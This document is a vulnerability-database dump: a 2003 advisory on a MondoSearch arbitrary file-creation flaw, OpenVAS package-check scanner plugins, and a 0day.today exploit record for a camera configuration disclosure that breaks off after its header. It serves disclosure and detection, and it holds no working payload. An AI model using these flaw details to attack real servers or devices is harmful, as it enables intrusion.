Problem:
MondoSearch is web site search engine made by MondoSoft.
MsmSetup.exe is one of the programs in the default installation. This
program contains a vulnerability that makes it possible to create files
with user specified content on the webserver or anywhere else, where the
executing user (typically IUSR_xxx) has write access.
Details:
The vulnerability occurs when the Msmsetup.exe is called with a
specially crafted querystring.
Impact:
It is possible for a malicious user to, create and execute arbitrary ASP
code on the server. This could in turn, lead to a full compromise of the
server.
Corrective actions:
MondoSoft has released a patch for this issue.
http://www.mondosoft.com/security
Disclaimer:
The information within this document may change without notice. Use of
this information constitutes acceptance for use in an "AS IS" condition.
There are NO warranties with regard to this information. In no event
shall PROTEGO be liable for any consequences or damages, including
direct, indirect, incidental, consequential, loss of business profits or
special damages, arising out of or in connection with the use or spread
of this information. Any use of this information lies within the user's
responsibility. All registered and unregistered trademarks represented
in this document are the sole property of their respective owners.
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
{"id": "SECURITYVULNS:DOC:5152", "bulletinFamily": "software", "title": "[Full-Disclosure] MondoSoft File Creation vulnerability", "description": "PROTEGO Security Advisory #PSA200302 \r\nTopic: MondoSoft File Creation vulnerability\r\nApplication : MondoSearch 4.4, 5.0, and 5.1\r\nAuthor: Jens H. Christensen (jhc at protego.dk)\r\nAdvisory URL: http://www.protego.dk/advisories/200302.html\r\nIdentifiers: CERT: VU# 756556\r\nVendor Name: MondoSoft \r\nVendor URL: http://www.mondosoft.com\r\nVendor contacted: 15-Sep-2003\r\nPublic release: 24-Sep-2003\r\n\r\nProblem:\r\nMondoSearch is web site search engine made by MondoSoft.\r\n\r\nMsmSetup.exe is one of the programs in the default installation. This\r\nprogram contains a vulnerability that makes it possible to create files\r\nwith user specified content on the webserver or anywhere else, where the\r\nexecuting user (typically IUSR_xxx) has write access.\r\n\r\nDetails:\r\nThe vulnerability occurs when the Msmsetup.exe is called with a\r\nspecially crafted querystring.\r\n\r\nImpact:\r\nIt is possible for a malicious user to, create and execute arbitrary ASP\r\ncode on the server. This could in turn, lead to a full compromise of the\r\nserver. \r\n\r\nCorrective actions:\r\nMondoSoft has released a patch for this issue.\r\nhttp://www.mondosoft.com/security \r\n\r\nDisclaimer:\r\nThe information within this document may change without notice. Use of\r\nthis information constitutes acceptance for use in an "AS IS" condition.\r\nThere are NO warranties with regard to this information. In no event\r\nshall PROTEGO be liable for any consequences or damages, including\r\ndirect, indirect, incidental, consequential, loss of business profits or\r\nspecial damages, arising out of or in connection with the use or spread\r\nof this information. Any use of this information lies within the user's\r\nresponsibility. All registered and unregistered trademarks represented\r\nin this document are the sole property of their respective owners. \r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "published": "2003-09-24T00:00:00", "modified": "2003-09-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5152", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:08", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "4aea3baa179ae9e58fccb90acef6dfae"}, {"key": "href", "hash": "6eeb0f9a4c2a253d2e42409393fe925d"}, {"key": "modified", "hash": "6d748741cb403b132c41d6d40b7614c7"}, {"key": "published", "hash": "6d748741cb403b132c41d6d40b7614c7"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "562d2adc8142cf315b8b488ce1b770da"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "1521a60d399ca6abc515764ee292250a62464a2cf23f29f80d92f8ca761d1168", "viewCount": 2, "enchantments": {"score": {"value": 3.7, "vector": "NONE", "modified": "2018-08-31T11:10:08"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310852529", "OPENVAS:1361412562310852527"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1485-1", "OPENSUSE-SU-2019:1481-1", "OPENSUSE-SU-2019:1479-1"]}, {"type": "ubuntu", "idList": ["USN-3996-1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994293"]}, {"type": "zdt", "idList": ["1337DAY-ID-32799", "1337DAY-ID-32772", "1337DAY-ID-32775", "1337DAY-ID-32771", "1337DAY-ID-32767", "1337DAY-ID-32754", "1337DAY-ID-32753", "1337DAY-ID-32757", "1337DAY-ID-32725", "1337DAY-ID-32724"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152997"]}, {"type": "kitploit", "idList": ["KITPLOIT:3928947731225997712"]}], "modified": "2018-08-31T11:10:08"}, "vulnersScore": 3.7}, "objectVersion": "1.3", "affectedSoftware": []}
{"openvas": [{"lastseen": "2020-02-26T16:44:17", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201114", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201114", "title": "Huawei EulerOS: Security Advisory for libgcrypt (EulerOS-SA-2020-1114)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1114\");\n script_version(\"2020-02-24T09:06:45+0000\");\n script_cve_id(\"CVE-2015-0837\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:06:45 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:06:45 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for libgcrypt (EulerOS-SA-2020-1114)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1114\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1114\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'libgcrypt' package(s) announced via the EulerOS-SA-2020-1114 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The mpi_powm function in Libgcrypt before 1.6.3 and GnuPG before 1.4.19 allows attackers to obtain sensitive information by leveraging timing differences when accessing a pre-computed table during modular exponentiation, related to a 'Last-Level Cache Side-Channel Attack.'(CVE-2015-0837)\");\n\n script_tag(name:\"affected\", value:\"'libgcrypt' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libgcrypt\", rpm:\"libgcrypt~1.5.3~14.h4.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgcrypt-devel\", rpm:\"libgcrypt-devel~1.5.3~14.h4.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-02-26T16:44:37", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201115", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201115", "title": "Huawei EulerOS: Security Advisory for libjpeg-turbo (EulerOS-SA-2020-1115)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1115\");\n script_version(\"2020-02-24T09:06:46+0000\");\n script_cve_id(\"CVE-2014-9092\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:06:46 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:06:46 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for libjpeg-turbo (EulerOS-SA-2020-1115)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1115\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1115\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'libjpeg-turbo' package(s) announced via the EulerOS-SA-2020-1115 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"libjpeg-turbo before 1.3.1 allows remote attackers to cause a denial of service (crash) via a crafted JPEG file, related to the Exif marker.(CVE-2014-9092)\");\n\n script_tag(name:\"affected\", value:\"'libjpeg-turbo' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libjpeg-turbo\", rpm:\"libjpeg-turbo~1.2.90~6.h5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjpeg-turbo-devel\", rpm:\"libjpeg-turbo-devel~1.2.90~6.h5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-02-26T16:47:19", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201109", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201109", "title": "Huawei EulerOS: Security Advisory for jakarta-commons-httpclient (EulerOS-SA-2020-1109)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1109\");\n script_version(\"2020-02-24T09:05:08+0000\");\n script_cve_id(\"CVE-2015-5262\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:05:08 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:05:08 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for jakarta-commons-httpclient (EulerOS-SA-2020-1109)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1109\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1109\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'jakarta-commons-httpclient' package(s) announced via the EulerOS-SA-2020-1109 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"http/conn/ssl/SSLConnectionSocketFactory.java in Apache HttpComponents HttpClient before 4.3.6 ignores the http.socket.timeout configuration setting during an SSL handshake, which allows remote attackers to cause a denial of service (HTTPS call hang) via unspecified vectors.(CVE-2015-5262)\");\n\n script_tag(name:\"affected\", value:\"'jakarta-commons-httpclient' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"jakarta-commons-httpclient\", rpm:\"jakarta-commons-httpclient~3.1~16.h1.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-02-26T16:44:26", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201123", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201123", "title": "Huawei EulerOS: Security Advisory for perl-Data-Dumper (EulerOS-SA-2020-1123)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1123\");\n script_version(\"2020-02-24T09:06:58+0000\");\n script_cve_id(\"CVE-2014-4330\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:06:58 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:06:58 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for perl-Data-Dumper (EulerOS-SA-2020-1123)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1123\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1123\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'perl-Data-Dumper' package(s) announced via the EulerOS-SA-2020-1123 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Dumper method in Data::Dumper before 2.154, as used in Perl 5.20.1 and earlier, allows context-dependent attackers to cause a denial of service (stack consumption and crash) via an Array-Reference with many nested Array-References, which triggers a large number of recursive calls to the DD_dump function.(CVE-2014-4330)\");\n\n script_tag(name:\"affected\", value:\"'perl-Data-Dumper' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Data-Dumper\", rpm:\"perl-Data-Dumper~2.145~3.h1.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-02-26T16:48:16", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201104", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201104", "title": "Huawei EulerOS: Security Advisory for gnupg2 (EulerOS-SA-2020-1104)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1104\");\n script_version(\"2020-02-24T09:05:03+0000\");\n script_cve_id(\"CVE-2015-1606\", \"CVE-2015-1607\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:05:03 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:05:03 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for gnupg2 (EulerOS-SA-2020-1104)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1104\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1104\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'gnupg2' package(s) announced via the EulerOS-SA-2020-1104 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"kbx/keybox-search.c in GnuPG before 1.4.19, 2.0.x before 2.0.27, and 2.1.x before 2.1.2 does not properly handle bitwise left-shifts, which allows remote attackers to cause a denial of service (invalid read operation) via a crafted keyring file, related to sign extensions and 'memcpy with overlapping ranges.'(CVE-2015-1607)\n\nThe keyring DB in GnuPG before 2.1.2 does not properly handle invalid packets, which allows remote attackers to cause a denial of service (invalid read and use-after-free) via a crafted keyring file.(CVE-2015-1606)\");\n\n script_tag(name:\"affected\", value:\"'gnupg2' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"gnupg2\", rpm:\"gnupg2~2.0.22~5.h2.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-02-26T20:40:34", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-02-26T00:00:00", "published": "2020-02-21T00:00:00", "id": "OPENVAS:1361412562310877493", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877493", "title": "Fedora: Security Advisory for dovecot (FEDORA-2020-0e6a67af5a)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877493\");\n script_version(\"2020-02-26T06:23:50+0000\");\n script_cve_id(\"CVE-2020-7046\", \"CVE-2020-7957\", \"CVE-2019-19722\", \"CVE-2019-11500\", \"CVE-2019-10691\", \"CVE-2019-7524\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-26 06:23:50 +0000 (Wed, 26 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-21 04:04:22 +0000 (Fri, 21 Feb 2020)\");\n script_name(\"Fedora: Security Advisory for dovecot (FEDORA-2020-0e6a67af5a)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2020-0e6a67af5a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NJXHOUT3FH2DJNMACSX4GHPP4MUV4UKA\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dovecot'\n package(s) announced via the FEDORA-2020-0e6a67af5a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Dovecot is an IMAP server for Linux/UNIX-like systems, written with security\nprimarily in mind. It also contains a small POP3 server. It supports mail\nin either of maildir or mbox formats.\n\nThe SQL drivers and authentication plug-ins are in their subpackages.\");\n\n script_tag(name:\"affected\", value:\"'dovecot' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"dovecot\", rpm:\"dovecot~2.3.9.3~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "zdt": [{"lastseen": "2020-02-27T01:04:37", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "1337DAY-ID-34013", "href": "https://0day.today/exploit/description/34013", "title": "Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure\r\n# Author: Todor Donev\r\n# Date: 2020-02-23\r\n# Vendor: https://acesecurity.jp\r\n# Product Link: https://acesecurity.jp/support/top/wip_series/wip-90113\r\n# CVE: N/A\r\n\r\n#!/usr/bin/perl\r\n#\r\n# ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure\r\n#\r\n# Copyright 2020 (c) Todor 